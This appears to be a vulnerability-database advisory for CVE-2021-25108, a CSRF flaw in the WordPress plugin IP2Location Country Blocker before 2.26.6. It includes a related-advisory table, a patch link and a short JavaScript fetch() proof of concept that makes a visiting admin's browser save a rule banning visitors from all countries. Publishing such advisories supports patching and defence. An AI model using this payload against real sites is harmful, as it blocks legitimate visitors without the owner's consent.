IP2Location Country Blocker < 2.26.6 - Arbitrary Country Ban via CSRF
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2021-25108 | 7 Feb 202216:15 | – | attackerkb | |
| CVE-2021-25108 | 7 Feb 202218:35 | – | circl | |
| Wordpress Plugin IP2Location Country Blocker 跨站请求伪造漏洞 | 7 Feb 202200:00 | – | cnnvd | |
| Wordpress Plugin IP2Location Country Blocker Cross-Site Request Forgery Vulnerability | 31 Mar 202200:00 | – | cnvd | |
| Wordpress Plugin IP2Location Country Blocker Cross-Site Request Forgery Vulnerability | 31 Mar 202200:00 | – | cnvd | |
| CVE-2021-25108 | 7 Feb 202215:47 | – | cve | |
| CVE-2021-25108 IP2Location Country Blocker < 2.26.6 - Arbitrary Country Ban via CSRF | 7 Feb 202215:47 | – | cvelist | |
| EUVD-2021-12020 | 7 Oct 202500:30 | – | euvd | |
| CVE-2021-25108 | 7 Feb 202216:15 | – | nvd | |
| CVE-2021-25108 | 7 Feb 202216:15 | – | osv |
10
| Source | Link |
|---|---|
| plugins | www.plugins.trac.wordpress.org/changeset/2653459 |
Make an admin open a page with the following code in it, which will ban visitors from all countries:
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"ip2location_country_blocker_save_rules", "countries[]": "nonexistent", "mode": 0}),
"method": "POST",
"credentials": "include"
})
.then(response => response.text())
.then(function(data) { console.log(data); });Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Apr 2022 07:12Current
0.5Low risk
Vulners AI Score0.5
CVSS 25.8
CVSS 3.17.1
EPSS0.00451